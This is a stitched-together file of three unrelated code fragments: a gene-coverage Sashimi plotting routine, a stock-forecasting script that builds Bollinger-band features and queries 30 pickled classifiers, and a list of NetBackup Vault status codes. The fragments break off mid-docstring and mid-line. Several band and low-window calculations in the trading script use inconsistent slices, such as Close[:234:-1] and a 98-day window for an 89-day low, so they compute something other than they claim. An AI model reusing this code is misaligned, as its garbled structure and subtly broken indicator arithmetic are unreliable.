        params = dict()
    params.setdefault('jparams', [{}, {}, {}])
    aliases = ('low_cov_junctions', 'high_cov_junctions', 'interest_junctions')
    for idx, alias in enumerate(aliases):
        # An alias entry takes precedence over the corresponding jparams slot.
        merged = params.pop(alias, params['jparams'][idx])
        for dkey, dval in DEFAULT_JPARAMS[idx].items():
            merged.setdefault(dkey, dval)
        params['jparams'][idx] = merged
    for dkey, dval in DEFAULT_PARAMS.items():
        params.setdefault(dkey, dval)
    return params
def get_index(samples, names):
    """Map sample names to their positions within *names*.

    *names* may be a list (position = list index) or a dict whose items are
    (position, name) pairs.  Unknown samples are logged and re-raised as
    KeyError.
    """
    if not samples:
        return []
    if isinstance(names, list):
        lookup = {name: pos for pos, name in enumerate(names)}
    else:
        lookup = {name: pos for pos, name in names.items()}
    try:
        return [lookup[name] for name in samples]
    except KeyError:
        missing = [name for name in samples if name not in lookup]
        logger.error('did not find the following samples: %s', ','.join(missing))
        raise
# sashimi plots
def sashimi_figure(self, samples=None, short_read_samples=None, draw_gene_track=True,
                   long_read_params=None, short_read_params=None, junctions_of_interest=None, x_range=None):
    '''Arranges multiple Sashimi plots of the gene.

    The Sashimi figure consist of a reference gene track, long read sashimi plots for one or more samples or groups of samples,
    and optionally short read sashimi plots for one or more samples or groups of samples.

    :param samples: Definition of samples (as a list) or groups of samples (as a dict) for long read plots.
    :param short_read_samples: Definition of samples (as a list) or groups of samples (as a dict) for short read plots.
    :param draw_gene_track: Specify whether to plot the reference gene track.
    :param long_read_params: Dict with parameters for the long read plots, get passed to self.sashimi_plot.
        See isotools._gene_plots.DEFAULT_PARAMS and isotools._gene_plots.DEFAULT_JPARAMS
    :param short_read_params: Dict with parameters for the short read plots, get passed to self.sashimi_plot_short_reads.
        See isotools._gene_plots.DEFAULT_PARAMS and isotools._gene_plots.DEFAULT_JPARAMS
    :param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighted in the plots)
    :param x_range: Genomic positions to specify the x range of the plot.
    :return: Tuple with figure and axes'''
    draw_gene_track = bool(draw_gene_track)
    if samples is None:
        samples = {}
    if short_read_samples is None:
        short_read_samples = {}
    if not samples and not short_read_samples:
        samples = {'all': None}
    if long_read_params is None:
        long_read_params = {}
    if short_read_params is None:
        short_read_params = {}
    # One axis per plot; the gene track (if drawn) occupies axes[0].
    f, axes = plt.subplots(len(samples) + len(short_read_samples) + draw_gene_track)
    axes = np.atleast_1d(axes)  # in case there was only one subplot
    if draw_gene_track:
        self.gene_track(ax=axes[0], x_range=x_range)
    for i, (sname, sidx) in enumerate(samples.items()):
        self.sashimi_plot(sidx, sname, axes[i + draw_gene_track], junctions_of_interest, x_range=x_range, **long_read_params)
    for i, (sname, sidx) in enumerate(short_read_samples.items()):
        # BUG FIX: the short-read plots previously received **long_read_params,
        # leaving `short_read_params` entirely unused; forward the correct dict.
        self.sashimi_plot_short_reads(sidx, sname, axes[i + len(samples) + draw_gene_track], junctions_of_interest, x_range=x_range,
                                      **short_read_params)
    return f, axes
def sashimi_plot_short_reads(self, samples=None, title='short read coverage', ax=None, junctions_of_interest=None, x_range=None,
                             y_range=None, log_y=True,
                             jparams=None, min_cov_th=.001, high_cov_th=.05, text_width=.02, arc_type='both', text_height=1,
                             exon_color='green'):
    '''Draws short read Sashimi plot of the gene.

    The Sashimi plot depicts the genomic coverage from short read sequencing as blocks, and junction coverage as arcs.

    :param samples: Names of the short read samples to be depicted (as a list).
    :param title: Specify the title of the axis.
    :param ax: Specify the axis.
    :param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighted in the plots)
    :param x_range: Genomic positions to specify the x range of the plot.
    :param y_range: Range for the coverage axis of the plot. Note to include space for the junction arcs.
        If not specified, the range will be determined automatically.
    :param log_y: Log scale for the coverage.
    :param jparams: Define the appearance of junctions, depending on their priority.
        A list with three dicts, defining parameters for low coverage junctions, high coverage junctions, and junctions of interest.
        For default values, see isotools._gene_plots.DEFAULT_JPARAMS
    :param exon_color: Specify the color of the genomic coverage blocks (e.g. the exons)
    :param high_cov_th: Minimum coverage for a junction to be considered high coverage.
    :param min_cov_th: Coverage threshold for a junction to be considered at all.
    :param text_width: Control the horizontal space that gets reserved for labels on the arcs. This affects the height of the arcs.
    :param arc_type: Label the junction arcs with the "coverage" (e.g. number of supporting reads),
        "fraction" (e.g. fraction of supporting reads in %), or "both".
        NOTE(review): this parameter is never referenced in this function body — confirm whether labeling modes were meant to apply here.
    :param text_height: Control the vertical space that gets reserved for labels on the arcs. This affects the height of the arcs.'''
    if samples is None:
        samples = list(self._transcriptome.infos['short_reads']['name'])  # all samples grouped # pylint: disable=W0212
    sidx = get_index(samples, self._transcriptome.infos['short_reads']['name'])  # pylint: disable=W0212
    if x_range is None:
        x_range = (self.start - 100, self.end + 100)
    if jparams is None:
        jparams = DEFAULT_JPARAMS
    short_reads = [self.short_reads(idx) for idx in sidx]
    # jparams=[low_cov_junctions,high_cov_junctions,interest_junctions]
    start = short_reads[0].reg[1]
    end = short_reads[0].reg[2]
    # delta=np.zeros(end-start)
    # Accumulate per-base coverage and junction read counts over all samples.
    cov = np.zeros(end - start)
    junctions = {}
    for sr_cov in short_reads:
        cov += sr_cov.profile
        for k, v in sr_cov.junctions.items():
            junctions[k] = junctions.get(k, 0) + v
    # Thresholds below 1 are interpreted as fractions of the maximum coverage.
    if high_cov_th < 1:
        high_cov_th *= max(cov)
    if min_cov_th < 1:
        min_cov_th *= max(cov)
    if log_y:
        # log10 of coverage; zero-coverage positions become NaN (not drawn).
        cov = np.log10(cov, where=cov > 0, out=np.nan * cov)
    # exons
    if ax is None:
        _, ax = plt.subplots()
    ax.fill_between(range(start, end), 0, cov, facecolor=exon_color)
    # junctions
    textpositions = []
    for (x1, x2), w in junctions.items():
        # Priority selects the jparams entry: 2 = of interest, 1 = high, 0 = low coverage.
        if junctions_of_interest is not None and (x1, x2) in junctions_of_interest:
            priority = 2
        elif w < min_cov_th:
            continue
        elif w < high_cov_th:
            priority = 0
        else:
            priority = 1
        # Arc endpoints sit on the coverage profile on either side of the junction.
        y1 = cov[x1 - start - 1]
        y2 = cov[x2 - start]
        center = (x1 + x2) / 2
        width = x2 - x1
        bow_height = text_height
        if jparams[priority]['draw_label']:
            # Raise the arc until its label no longer collides with any placed label.
            while any(_label_overlap((center, max(y1, y2) + bow_height), tp, text_width, text_height) for tp in textpositions):
                bow_height += text_height
            textpositions.append((center, max(y1, y2) + bow_height))
        # Split into two half-arc heights so endpoints at different y meet at the apex.
        if y1 < y2:
            bow_height = (y2 - y1 + bow_height, bow_height)
        elif y1 > y2:
            bow_height = (bow_height, bow_height + y1 - y2)
        else:
            bow_height = (bow_height, bow_height)
        bow1 = patches.Arc((center, y1), width=width, height=bow_height[0] * 2, theta1=90, theta2=180,
                           linewidth=jparams[priority]['lwd'], edgecolor=jparams[priority]['color'], zorder=priority)
        bow2 = patches.Arc((center, y2), width=width, height=bow_height[1] * 2, theta1=0, theta2=90,
                           linewidth=jparams[priority]['lwd'], edgecolor=jparams[priority]['color'], zorder=priority)
        ax.add_patch(bow1)
        ax.add_patch(bow2)
        if jparams[priority]['draw_label']:
            _ = ax.text(center, max(y1, y2) + min(bow_height) + text_height / 3, w, horizontalalignment='center', verticalalignment='bottom',
                        bbox=dict(boxstyle='round', facecolor='wheat', edgecolor=None, alpha=0.5)).set_clip_on(True)
        # bbox_list.append(txt.get_tightbbox(renderer = fig.canvas.renderer))
    ax.set_xlim(*x_range)
    if y_range is not None:
        ax.set_ylim(*y_range)
    # NOTE(review): when labels were placed, the next branch overrides any
    # user-supplied y_range set just above — possibly unintended; confirm.
    if textpositions:
        ax.set_ylim(-text_height, max(tp[1] for tp in textpositions) + 2 * text_height)
    else:
        ax.set_ylim(-text_height, 3)  # todo: adjust y axis and ticklabels to coverage
    ax.set(frame_on=False)
    if log_y:
        # Tick positions are log10 values; labels show the raw read counts.
        ax.set_yticks([0, 1, 2, 3])
        ax.set_yticklabels([1, 10, 100, 1000])
    # ax.ticklabel_format(axis='x', style='sci',scilimits=(6,6))
    ax.set_title(title)
    ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos=None: f'{x:,.0f}'))
    return ax
def sashimi_plot(self, samples=None, title='Long read sashimi plot', ax=None, junctions_of_interest=None, x_range=None, select_transcripts=None,
y_range=None, log_y=True,
jparams=None, exon_color='green', min_cov_th=.001, high_cov_th=.05, text_width=1,
arc_type='both', text_height=1):
'''Draws long read Sashimi plot of the gene.
The Sashimi plot depicts the genomic long read sequencing coverage of one or more samples as blocks, and junction coverage as arcs.
:param samples: Names of the samples to be depicted (as a list).
:param title: Specify the title of the axis.
:param ax: Specify the axis.
:param junctions_of_interest: List of int pairs to define junctions of interest (which are highlighed in the plots)
:param x_range: Genomic positions to specify the x range of the plot.
If not specified, the range will be determined to include the complete gene.
:param y_range: Range for the coverage axis of the plot. Note to include space for the junction arcs.
If not specified, the range will be determined automatically.
:param log_y: Log scale for the coverage.
:param select_transcripts: A list of transcript numbers from which the coverage is to be depicted.
If obmitted, all transcripts are displayed.
:param jparams: Define the apperance of junctions, depending on their priority.
A list with three dicts, defining parameters for low coverage junctions, high coverage junctions, and junctions of interest.
For default values, see isotools._gene_plots.DEFAULT_JPARAMS
:param exon_color: | |
_BBD300 = np.sum(Close[:-301:-1])/300-(np.std(Close[-301:-1])*2) # Lower BollingerBand
_DiffD300_C = (Close[-1]-_BBD300)/_BBD300
_DiffD300_H3 = (_SMA_H3-_BBD300)/_BBD300
_BBD377 = np.sum(Close[:-378:-1])/377-(np.std(Close[-378:-1])*2) # Lower BollingerBand
_DiffD377_H3 = (_SMA_H3-_BBD377)/_BBD377
_DiffD377_C = (Close[-1]-_BBD377)/_BBD377
_BBU8 = np.sum(Close[:-9:-1])/8+(np.std(Close[:-9:-1])*2)
_DiffU8_C = np.round((Close[-1]-_BBU8)/_BBU8,3)
_BBU13 = np.sum(Close[:-14:-1])/13+(np.std(Close[:-14:-1])*2)
_DiffU13_L3 = np.round((_SMA_L3-_BBU13)/_BBU13,3)
_BBU21 = np.sum(Close[:-22:-1])/21+(np.std(Close[:-22:-1])*2)
_DiffU21_L3 = (_SMA_L3-_BBU21)/_BBU21
_DiffU21_C = (Close[-1]-_BBU21)/_BBU21
_BBU34 = np.sum(Close[:-35:-1])/34+(np.std(Close[:-35:-1])*2)
_DiffU34_C = (Close[-1]-_BBU34)/_BBU34
_DiffU34_L3 = (_SMA_L3-_BBU34)/_BBU34
_BBU55 = np.sum(Close[:-56:-1])/55+(np.std(Close[:-56:-1])*2)
_DiffU55_C = (Close[-1]-_BBU55)/_BBU55
_DiffU55_L3 = (_SMA_L3-_BBU55)/_BBU55
_BBU89 = np.sum(Close[:-90:-1])/89+(np.std(Close[:-90:-1])*2)
_DiffU89_C = (Close[-1]-_BBU89)/_BBU89
_BBU100 = np.sum(Close[:-101:-1])/100+(np.std(Close[:-101:-1])*2)
_DiffU100_C = (Close[-1]-_BBU100)/_BBU100
_BBU144 = np.sum(Close[:-145:-1])/144+(np.std(Close[:-145:-1])*2)
_DiffU144_C = (Close[-1]-_BBU144)/_BBU144
_DiffU144_L3 = (_SMA_L3-_BBU144)/_BBU144
_BBU200 = np.sum(Close[:-201:-1])/200+(np.std(Close[:-201:-1])*2)
_DiffU200_L3 = (_SMA_L3-_BBU200)/_BBU200
_BBU233 = np.sum(Close[:234:-1])/233+(np.std(Close[:234:-1])*2)
_DiffU233_L3 = (_SMA_L3-_BBU233)/_BBU233
_DiffU233_C = (Close[-1]-_BBU233)/_BBU233
_BBU300 = np.sum(Close[:301:-1])/300+(np.std(Close[:301:-1])*2)
_DiffU300_L3 = (_SMA_L3-_BBU300)/_BBU300
_DiffU300_C = (Close[-1]-_BBU300)/_BBU300
_BBU377 = np.sum(Close[:377:-1])/377+(np.std(Close[:377:-1])*2)
_DiffU377_L3 = (_SMA_L3-_BBU377)/_BBU377
_DiffU377_C = (Close[-1]-_BBU377)/_BBU377
_High3_H = (Close[-1]-np.amax(High[:-4:-1]))/np.amax(High[:-4:-1])
_High5_H = (Close[-1]-np.amax(High[:-6:-1]))/np.amax(High[:-6:-1])
_High7_H = (Close[-1]-np.amax(High[:-8:-1]))/np.amax(High[:-8:-1])
_High11_H = (Close[-1]-np.amax(High[:-12:-1]))/np.amax(High[:-12:-1])
_High14_H = (Close[-1]-np.amax(High[:-15:-1]))/np.amax(High[:-15:-1])
_High13_H = (Close[-1]-np.amax(High[:-14:-1]))/np.amax(High[:-14:-1])
_High23_H = (Close[-1]-np.amax(High[:-24:-1]))/np.amax(High[:-24:-1])
_High55_H = (Close[-1]-np.amax(High[:-56:-1]))/np.amax(High[:-56:-1])
_High233_H = (Close[-1]-np.amax(High[:-234:-1]))/np.amax(High[:-234:-1])
_Low6_L = (Close[-1]-np.amin(Low[:-7:-1]))/np.amin(Low[:-7:-1])
_Low7_L = (Close[-1]-np.amin(Low[:-8:-1]))/np.amin(Low[:-8:-1])
_Low8_L = (Close[-1]-np.amin(Low[:-9:-1]))/np.amin(Low[:-9:-1])
_Low10_L = (Close[-1]-np.amin(Low[:-11:-1]))/np.amin(Low[:-11:-1])
_Low12_L = (Close[-1]-np.amin(Low[:-13:-1]))/np.amin(Low[:-13:-1])
_Low14_L = (Close[-1]-np.amin(Low[:-15:-1]))/np.amin(Low[:-15:-1])
_Low15_L = (Close[-1]-np.amin(Low[:-16:-1]))/np.amin(Low[:-16:-1])
_Low19_L = (Close[-1]-np.amin(Low[:-20:-1]))/np.amin(Low[:-20:-1])
_Low23_L = (Close[-1]-np.amin(Low[:-24:-1]))/np.amin(Low[:-24:-1])
_Low25_L = (Close[-1]-np.amin(Low[:-26:-1]))/np.amin(Low[:-26:-1])
_Low34_L = (Close[-1]-np.amin(Low[:-35:-1]))/np.amin(Low[:-35:-1])
_Low55_L = (Close[-1]-np.amin(Low[:-56:-1]))/np.amin(Low[:-56:-1])
_Low89_L = (Close[-1]-np.amin(Low[:-99:-1]))/np.amin(Low[:-99:-1])
_Low144_L = (Close[-1]-np.amin(Low[:-145:-1]))/np.amin(Low[:-145:-1])
_Low233_L = (Close[-1]-np.amin(Low[:-234:-1]))/np.amin(Low[:-234:-1])
df = pd.DataFrame(columns = FEATURES_IQ19)
df = df.append({
'_BBD55':_BBD55,
'_BBU144':_BBU144,
'_BBU300':_BBU300,
'_BBU55':_BBU55,
'_dateDayOfMonth':_dateDayOfMonth,
'_dateDayOfYear':_dateDayOfYear,
'_dateMonthOfYear':_dateMonthOfYear,
'_dateWeekOfYear':_dateWeekOfYear,
'_Diff_CtoH19':_Diff_CtoH19,
'_Diff_CtoH5':_Diff_CtoH5,
'_Diff_CtoL19':_Diff_CtoL19,
'_Diff_CtoL20':_Diff_CtoL20,
'_Diff_CtoL9':_Diff_CtoL9,
'_DiffD100_H3':_DiffD100_H3,
'_diffStochSign100':_diffStochSign100,
'_diffStochSign34':_diffStochSign34,
'_DiffU8_C':_DiffU8_C,
'_EvNo20':_EvNo20,
'_Low55_L':_Low55_L,
'_Low8_L':_Low8_L,
'_Low89_L':_Low89_L,
'_PastSCH13to34':_PastSCH13to34,
'_PastSCH21to34':_PastSCH21to34,
'_Perc200_L20':_Perc200_L20,
'_Perc21_H':_Perc21_H,
'_Perc233_H80':_Perc233_H80,
'_Perc377_L':_Perc377_L,
'_Perc8_H80':_Perc8_H80,
'_SMA233vs377':_SMA233vs377,
'_SMA34vs89':_SMA34vs89,
'_SMA8_C':_SMA8_C,
'_SMA89vs144':_SMA89vs144,
'_STD13sign':_STD13sign,
'_STD144sign':_STD144sign,
'_STD233_C':_STD233_C,
'_STD300_C':_STD300_C,
'_STD300sign':_STD300sign,
'_STD34_C':_STD34_C,
'_STD377_C':_STD377_C,
'_stoch377Level':_stoch377Level,
'Diff_RL100_RL377':Diff_RL100_RL377,
'Diff_RL144_RL200':Diff_RL144_RL200,
'Diff_RL144_RL377':Diff_RL144_RL377,
'Diff_RL200_RL377':Diff_RL200_RL377,
'Diff_RL21_RL34':Diff_RL21_RL34,
'Diff_RL233_RL377':Diff_RL233_RL377,
'Diff_RL5_RL21':Diff_RL5_RL21,
'Diff_RL55_RL89':Diff_RL55_RL89,
'Diff_RL8_RL55':Diff_RL8_RL55,
'RL200':RL200
}, ignore_index = True)
FileLocation4excel = importantPath+'\\for'+eachTicker+'_excel.xlsx'
print("Priming {0}".format(FileLocation4excel))
df.to_excel(FileLocation4excel, index=False)
#print(df)
except Exception as e:
print("Exception before saving excel: " + str(e))
pass
c.timer.print_elapsed("\nFinished computing features and priming files")
###################################################################3
# Accumulates one (Name, Forecast) row per ticker further below.
Ultimate_df2 = pd.DataFrame(columns=['Name', 'Forecast'])

# FIX: `sklearn.externals.joblib` was deprecated in scikit-learn 0.21 and
# removed in 0.23; prefer the standalone `joblib` package and fall back to
# the bundled copy only for legacy environments.
try:
    import joblib
except ImportError:
    from sklearn.externals import joblib

print("Loading pickled files...")
# Load the 30 pre-trained models (<prefix>01.pkl ... <prefix>30.pkl),
# keeping the individual logreg_NN names relied on by the prediction code.
(logreg_01, logreg_02, logreg_03, logreg_04, logreg_05,
 logreg_06, logreg_07, logreg_08, logreg_09, logreg_10,
 logreg_11, logreg_12, logreg_13, logreg_14, logreg_15,
 logreg_16, logreg_17, logreg_18, logreg_19, logreg_20,
 logreg_21, logreg_22, logreg_23, logreg_24, logreg_25,
 logreg_26, logreg_27, logreg_28, logreg_29, logreg_30) = [
    joblib.load(r'' + importantPath + pklFiles + '{:02d}.pkl'.format(i))
    for i in range(1, 31)
]
for eachTicker, eachRealNames in zip(yahoo_ticker_list, yahoo_RealNames_list):
print("\n== Starting calculations for {0} ===".format(eachTicker))
try:
Location = importantPath+'\\for'+eachTicker+'_excel.xlsx'
print("Reading {0}".format(Location))
data = pd.read_excel(Location)
feat01 = np.array(data[FEATURES01].values) # making a Numpay array from the Pandas dataset
feat02 = np.array(data[FEATURES02].values) # making a Numpay array from the Pandas dataset
feat03 = np.array(data[FEATURES03].values) # making a Numpay array from the Pandas dataset
feat04 = np.array(data[FEATURES04].values) # making a Numpay array from the Pandas dataset
feat05 = np.array(data[FEATURES05].values) # making a Numpay array from the Pandas dataset
feat06 = np.array(data[FEATURES06].values) # making a Numpay array from the Pandas dataset
feat07 = np.array(data[FEATURES07].values) # making a Numpay array from the Pandas dataset
feat08 = np.array(data[FEATURES08].values) # making a Numpay array from the Pandas dataset
feat09 = np.array(data[FEATURES09].values) # making a Numpay array from the Pandas dataset
feat10 = np.array(data[FEATURES10].values) # making a Numpay array from the Pandas dataset
feat11 = np.array(data[FEATURES11].values) # making a Numpay array from the Pandas dataset
feat12 = np.array(data[FEATURES12].values) # making a Numpay array from the Pandas dataset
feat13 = np.array(data[FEATURES13].values) # making a Numpay array from the Pandas dataset
feat14 = np.array(data[FEATURES14].values) # making a Numpay array from the Pandas dataset
feat15 = np.array(data[FEATURES15].values) # making a Numpay array from the Pandas dataset
feat16 = np.array(data[FEATURES16].values) # making a Numpay array from the Pandas dataset
feat17 = np.array(data[FEATURES17].values)
feat18 = np.array(data[FEATURES18].values)
feat19 = np.array(data[FEATURES19].values)
feat20 = np.array(data[FEATURES20].values)
feat21 = np.array(data[FEATURES21].values)
feat22 = np.array(data[FEATURES22].values)
feat23 = np.array(data[FEATURES23].values)
feat24 = np.array(data[FEATURES24].values)
feat25 = np.array(data[FEATURES25].values)
feat26 = np.array(data[FEATURES26].values)
feat27 = np.array(data[FEATURES27].values)
feat28 = np.array(data[FEATURES28].values)
feat29 = np.array(data[FEATURES29].values)
feat30 = np.array(data[FEATURES30].values)
print("Finished reading {0} and converting to arrays".format(Location))
except Exception as e:
print("Error reading xlsx: " + str(e))
##########################################################################
try:
print("Predicting probabilities for features...")
feats = [
feat01, feat02, feat03, feat04, feat05, feat06, feat07, feat08, feat09, feat10,
feat11, feat12, feat13, feat14, feat15, feat16, feat17, feat18, feat19, feat20,
feat21, feat22, feat23, feat24, feat25, feat26, feat27, feat28, feat29, feat30
]
for currentFeat in feats:
for index, feat in enumerate(currentFeat[0]):
if type(feat) is str:
# Fix for (probably inconsistencies of pickled data of older version, should probably be removed)
print("HACK: Converting: '{0}' due to old pickle format, assuming array syntax => single float".format(feat))
currentFeat[0, index] = float(feat[1:-1]) # float convert literal array syntax, possibly incorrect
#print("Converted {0}".format(currentFeat[0, index]))
#print(feat)
#print(index)
#print(type(feat))
Value_01 = logreg_01.predict_proba(feat01)
_01N5 = round(Value_01[0][0],6)
_01N4 = round(Value_01[0][1],6)
_01N3 = round(Value_01[0][2],6)
_01N2 = round(Value_01[0][3],6)
_01N1 = round(Value_01[0][4],6)
_01P1 = round(Value_01[0][6],6)
_01P2 = round(Value_01[0][7],6)
_01P3 = round(Value_01[0][8],6)
_01P4 = round(Value_01[0][9],6)
_01P5 = round(Value_01[0][10],6)
Value_02 = logreg_02.predict_proba(feat02)
_02N5 = round(Value_02[0][0],6)
_02N4 = round(Value_02[0][1],6)
_02N3 = round(Value_02[0][2],6)
_02N2 = round(Value_02[0][3],6)
_02N1 = round(Value_02[0][4],6)
_02P1 = round(Value_02[0][6],6)
_02P2 = round(Value_02[0][7],6)
_02P3 = round(Value_02[0][8],6)
_02P4 = round(Value_02[0][9],6)
_02P5 = round(Value_02[0][10],6)
Value_03 = logreg_03.predict_proba(feat03)
_03N5 = round(Value_03[0][0],6)
_03N4 = round(Value_03[0][1],6)
_03N3 = round(Value_03[0][2],6)
_03N2 = round(Value_03[0][3],6)
_03N1 = round(Value_03[0][4],6)
_03P1 = round(Value_03[0][6],6)
_03P2 = round(Value_03[0][7],6)
_03P3 = round(Value_03[0][8],6)
_03P4 = round(Value_03[0][9],6)
_03P5 = round(Value_03[0][10],6)
Value_04 = logreg_04.predict_proba(feat04)
_04N5 = round(Value_04[0][0],6)
_04N4 = round(Value_04[0][1],6)
_04N3 = round(Value_04[0][2],6)
_04N2 = round(Value_04[0][3],6)
_04N1 = round(Value_04[0][4],6)
_04P1 = round(Value_04[0][6],6)
_04P2 = round(Value_04[0][7],6)
_04P3 = round(Value_04[0][8],6)
_04P4 = round(Value_04[0][9],6)
_04P5 = round(Value_04[0][10],6)
Value_05 = logreg_05.predict_proba(feat05)
_05N5 = round(Value_05[0][0],6)
_05N4 = round(Value_05[0][1],6)
_05N3 = round(Value_05[0][2],6)
_05N2 = round(Value_05[0][3],6)
_05N1 = round(Value_05[0][4],6)
_05P1 = round(Value_05[0][6],6)
_05P2 = round(Value_05[0][7],6)
_05P3 = round(Value_05[0][8],6)
_05P4 = round(Value_05[0][9],6)
_05P5 = round(Value_05[0][10],6)
Value_06 = logreg_06.predict_proba(feat06)
_06N5 = round(Value_06[0][0],6)
_06N4 = round(Value_06[0][1],6)
_06N3 = round(Value_06[0][2],6)
_06N2 = round(Value_06[0][3],6)
_06N1 = round(Value_06[0][4],6)
_06P1 = round(Value_06[0][6],6)
_06P2 = round(Value_06[0][7],6)
_06P3 = round(Value_06[0][8],6)
_06P4 = round(Value_06[0][9],6)
_06P5 = round(Value_06[0][10],6)
Value_07 = logreg_07.predict_proba(feat07)
_07N5 = round(Value_07[0][0],6)
_07N4 = round(Value_07[0][1],6)
_07N3 = round(Value_07[0][2],6)
_07N2 = round(Value_07[0][3],6)
_07N1 = round(Value_07[0][4],6)
_07P1 = round(Value_07[0][6],6)
_07P2 = round(Value_07[0][7],6)
_07P3 = round(Value_07[0][8],6)
_07P4 = round(Value_07[0][9],6)
_07P5 = round(Value_07[0][10],6)
Value_08 = logreg_08.predict_proba(feat08)
_08N5 = round(Value_08[0][0],6)
_08N4 = round(Value_08[0][1],6)
_08N3 = round(Value_08[0][2],6)
_08N2 = round(Value_08[0][3],6)
_08N1 = round(Value_08[0][4],6)
_08P1 = round(Value_08[0][6],6)
_08P2 = round(Value_08[0][7],6)
_08P3 = round(Value_08[0][8],6)
_08P4 = round(Value_08[0][9],6)
_08P5 = round(Value_08[0][10],6)
Value_09 = logreg_09.predict_proba(feat09)
_09N5 = round(Value_09[0][0],6)
_09N4 = round(Value_09[0][1],6)
_09N3 = round(Value_09[0][2],6)
_09N2 = round(Value_09[0][3],6)
_09N1 = round(Value_09[0][4],6)
_09P1 = round(Value_09[0][6],6)
_09P2 = round(Value_09[0][7],6)
_09P3 = round(Value_09[0][8],6)
_09P4 = round(Value_09[0][9],6)
_09P5 = round(Value_09[0][10],6)
Value_10 = logreg_10.predict_proba(feat10)
_10N5 = round(Value_10[0][0],6)
_10N4 = round(Value_10[0][1],6)
_10N3 = round(Value_10[0][2],6)
_10N2 = round(Value_10[0][3],6)
_10N1 = round(Value_10[0][4],6)
_10P1 = round(Value_10[0][6],6)
_10P2 = round(Value_10[0][7],6)
_10P3 = round(Value_10[0][8],6)
_10P4 = round(Value_10[0][9],6)
_10P5 = round(Value_10[0][10],6)
Value_11 = logreg_11.predict_proba(feat11)
_11N5 = round(Value_11[0][0],6)
_11N4 = round(Value_11[0][1],6)
_11N3 = round(Value_11[0][2],6)
_11N2 = round(Value_11[0][3],6)
_11N1 = round(Value_11[0][4],6)
_11P1 = round(Value_11[0][6],6)
_11P2 = round(Value_11[0][7],6)
_11P3 = round(Value_11[0][8],6)
_11P4 = round(Value_11[0][9],6)
_11P5 = round(Value_11[0][10],6)
Value_12 = logreg_12.predict_proba(feat12)
_12N5 = round(Value_12[0][0],6)
_12N4 = round(Value_12[0][1],6)
_12N3 = round(Value_12[0][2],6)
_12N2 = round(Value_12[0][3],6)
_12N1 = round(Value_12[0][4],6)
_12P1 = round(Value_12[0][6],6)
_12P2 = round(Value_12[0][7],6)
_12P3 = round(Value_12[0][8],6)
_12P4 = round(Value_12[0][9],6)
_12P5 = round(Value_12[0][10],6)
Value_13 = logreg_13.predict_proba(feat13)
_13N5 = round(Value_13[0][0],6)
_13N4 = round(Value_13[0][1],6)
_13N3 = round(Value_13[0][2],6)
_13N2 = round(Value_13[0][3],6)
_13N1 = round(Value_13[0][4],6)
_13P1 = round(Value_13[0][6],6)
_13P2 = round(Value_13[0][7],6)
_13P3 = round(Value_13[0][8],6) | |
found",
228: "unable to process request",
229: "events out of sequence - image inconsistency",
230: "the specified policy does not exist in the configuration database",
231: "schedule windows overlap",
232: "a protocol error has occurred",
233: "premature eof encountered",
234: "communication interrupted",
235: "inadequate buffer space",
236: "the specified client does not exist in an active policy within the configuration database",
237: "the specified schedule does not exist in an active policy in the configuration database",
238: "the database contains conflicting or erroneous entries",
239: "the specified client does not exist in the specified policy",
240: "no schedules of the correct type exist in this policy",
241: "the specified schedule is the wrong type for this request",
242: "operation would cause an illegal duplication",
243: "the client is not in the configuration",
245: "the specified policy is not of the correct client type",
246: "no active policies in the configuration database are of the correct client type",
247: "the specified policy is not active",
248: "there are no active policies in the configuration database",
249: "the file list is incomplete",
250: "the image was not created with TIR information",
251: "the tir information is zero length",
252: "An extended error status has been encountered, check detailed status",
253: "the catalog image .f file has been archived",
254: "server name not found in the NetBackup configuration",
256: "logic error encountered",
257: "failed to get job data",
258: "Vault duplication was aborted by administrator request",
259: "vault configuration file not found",
260: "failed to send signal",
261: "vault internal error 261",
262: "vault internal error 262",
263: "session ID assignment failed",
265: "session ID file is empty or corrupt",
266: "cannot find robot, vault, or profile in the vault configuration",
267: "cannot find the local host name",
268: "the vault session directory is either missing or inaccessible",
269: "no vault session ID was found",
270: "unable to obtain process id, getpid failed",
271: "vault XML version mismatch",
272: "execution of a vault notify script failed",
273: "invalid job id",
274: "no profile was specified",
275: "a session is already running for this vault",
276: "invalid session ID",
277: "unable to print reports",
278: "unable to collect pre eject information from the API",
279: "eject process is complete",
280: "there are no volumes to eject",
281: "vault core error",
282: "cannot connect to nbvault server",
283: "error(s) occurred during vault report generation",
284: "error(s) occurred during vault report distribution",
285: "unable to locate vault directory",
286: "vault internal error",
287: "vault eject failed",
288: "vault eject partially succeeded",
289: "cannot consolidate reports of sessions from container and slot-based vaults",
290: "one or more errors detected during eject processing",
291: "number of media has exceeded capacity of MAP; must perform manual eject using vltopmenu or vlteject",
292: "eject process failed to start",
293: "eject process has been aborted",
294: "vault catalog backup failed",
295: "eject process could not obtain information about the robot",
296: "process called but nothing to do",
297: "all volumes are not available to eject",
298: "the library is not ready to eject volumes",
299: "there is no available MAP for ejecting",
300: "vmchange eject verify not responding",
301: "vmchange api_eject command failed",
302: "error encountered trying backup of catalog (multiple tape catalog backup)",
303: "error encountered executing Media Manager command",
304: "specified profile not found",
305: "multiple profiles exist",
306: "vault duplication partially succeeded",
307: "eject process has already been run for the requested Vault session",
308: "no images duplicated",
309: "report requested without eject being run",
310: "Updating of Media Manager database failed",
311: "Iron Mountain Report is already created for this session",
312: "invalid container database entry",
313: "container does not exist in container database",
314: "container database truncate operation failed",
315: "failed appending to container database",
316: "container_id is not unique in container database",
317: "container database close operation failed",
318: "container database lock operation failed",
319: "container database open operation failed",
320: "the specified container is not empty",
321: "container cannot hold any media from the specified robot",
322: "cannot find vault in vault configuration file",
323: "cannot find robot in vault configuration file",
324: "invalid data found in retention map file for duplication",
325: "unable to find policy/schedule for image using retention mapping",
326: "specified file contains no valid entry",
327: "no media ejected for the specified vault session",
328: "invalid container ID",
329: "invalid recall status",
330: "invalid database host",
331: "invalid container description",
332: "error getting information from EMM database",
333: "error getting information from media manager command line",
334: "unable to receive response from robot; robot not ready.",
335: "failure occurred while suspending media for eject",
336: "failure occurred while updating session information",
337: "failure occurred while updating the eject.mstr file",
338: "vault eject timed out",
339: "vault configuration file format error",
340: "vault configuration tag not found",
341: "vault configuration serialization failed",
342: "cannot modify - stale view",
343: "robot already exists",
344: "vault already exists",
345: "profile already exists",
346: "duplicate MAP",
347: "vault configuration cache not initialized",
348: "specified report does not exist",
349: "incorrect catalog backup policy",
